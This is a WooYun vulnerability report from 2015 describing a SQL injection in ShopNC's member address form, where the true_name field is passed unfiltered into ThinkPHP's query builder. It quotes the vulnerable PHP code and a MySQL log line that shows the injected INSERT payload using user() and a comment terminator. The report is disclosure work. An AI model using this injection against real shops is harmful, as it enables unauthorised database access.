当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143429

漏洞标题:shopnc sql注入漏洞

相关厂商:shopnc.net

漏洞作者: pang0lin

提交时间:2015-10-10 13:40

修复时间:2016-01-13 13:43

公开时间:2016-01-13 13:43

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-10: 细节已通知厂商并且等待厂商处理中
2015-10-15: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-09: 细节向核心白帽子及相关领域专家公开
2015-12-19: 细节向普通白帽子公开
2015-12-29: 细节向实习白帽子公开
2016-01-13: 细节向公众公开

简要描述:

shopnc注入漏洞

详细说明:

其实这与其怪罪于shopnc,还不如说是thinkphp框架的问题,只是shopnc自己没有与时俱进,不知道现在thinkphp框架已经有很多问题了。
1.首先定位到漏洞代码shop/control/member_address.php文件

if (chksubmit()){
/**
* 验证表单信息
*/
$obj_validate = new Validate();
$obj_validate->validateparam = array(
array("input"=>$_POST["true_name"],"require"=>"true","message"=>$lang['member_address_receiver_null']),
array("input"=>$_POST["area_id"],"require"=>"true","validator"=>"Number","message"=>$lang['member_address_wrong_area']),
array("input"=>$_POST["city_id"],"require"=>"true","validator"=>"Number","message"=>$lang['member_address_wrong_area']),
array("input"=>$_POST["area_info"],"require"=>"true","message"=>$lang['member_address_area_null']),
array("input"=>$_POST["address"],"require"=>"true","message"=>$lang['member_address_address_null']),
array("input"=>$_POST['tel_phone'].$_POST['mob_phone'],'require'=>'true','message'=>$lang['member_address_phone_and_mobile'])
);
$error = $obj_validate->validate();
if ($error != ''){
showValidateError($error);
}
$data = array();
$data['member_id'] = $_SESSION['member_id'];
$data['true_name'] = $_POST['true_name'];
$data['area_id'] = intval($_POST['area_id']);
$data['city_id'] = intval($_POST['city_id']);
$data['area_info'] = $_POST['area_info'];
$data['address'] = $_POST['address'];
$data['tel_phone'] = $_POST['tel_phone'];
$data['mob_phone'] = $_POST['mob_phone'];
$data['is_default'] = $_POST['is_default'] ? 1 : 0;
if ($_POST['is_default']) {
$address_class->editAddress(array('is_default'=>0),array('member_id'=>$_SESSION['member_id'],'is_default'=>1));//继续跟踪
}

if (intval($_POST['id']) > 0){
$rs = $address_class->editAddress($data, array('address_id' => $_POST['id']));
if (!$rs){
showDialog($lang['member_address_modify_fail'],'','error');
}
}


2.继续跟踪editAddress函数。

public function editAddress($update, $condition){
return $this->where($condition)->update($update);
}


3.该函数直接调用了thinkphp的where和update函数来执行代码,然后传入的参数中$_POST[‘true_name’]只验证了是否存在,而没有字符串有效性的判断。所以我们可以利用thinkphp本身的缺陷,构造payload。
首先添加一个地址。

4.png


然后使用burp进行抓包,修改其中的true_name字段为,见测试代码

3.png


然后再查看我们的收货地址。

2.png


4.我们去看一下mysql的日志文件

150925 10:36:39	  232 Connect	root@localhost on 33hao
232 Query SET CHARACTER_SET_CLIENT = utf8,
CHARACTER_SET_CONNECTION = utf8,
CHARACTER_SET_DATABASE = utf8,
CHARACTER_SET_RESULTS = utf8,
CHARACTER_SET_SERVER = utf8,
COLLATION_CONNECTION = utf8_general_ci,
COLLATION_DATABASE = utf8_general_ci,
COLLATION_SERVER = utf8_general_ci,
sql_mode=''
232 Query SELECT * FROM `33hao`.`33hao_member` WHERE ( member_id = '1' ) LIMIT 1
232 Query SELECT COUNT(*) AS nc_count FROM `33hao`.`33hao_address` WHERE ( member_id = '1' ) LIMIT 1
232 Query INSERT INTO `33hao`.`33hao_address` (member_id,true_name,area_id,city_id,area_info,address,tel_phone,mob_phone,is_default) VALUES ('1',1,1,1,1,user(),1,1,1) -- a,'38','36','北京 北京市 西城区','awddsad','13800000000','13800000000','0')


漏洞证明:

2.png

修复方案:

过滤

版权声明:转载请注明来源 pang0lin@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-01-13 13:43

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无